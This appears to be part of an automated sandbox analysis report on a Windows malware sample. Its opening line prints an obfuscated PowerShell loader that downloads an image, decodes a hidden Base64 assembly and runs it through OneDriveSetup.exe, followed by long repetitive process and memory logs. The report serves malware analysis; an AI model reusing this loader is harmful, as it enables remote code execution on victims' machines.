EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00423149 push eax; ret 6_2_00423179
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004231C8 push eax; ret 6_2_00423179
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0040E21D push ecx; ret 6_2_0040E230
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851E558 push eax; iretd 6_2_0851E559
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeMemory allocated: 8510000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeMemory allocated: 8B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeMemory allocated: 8960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
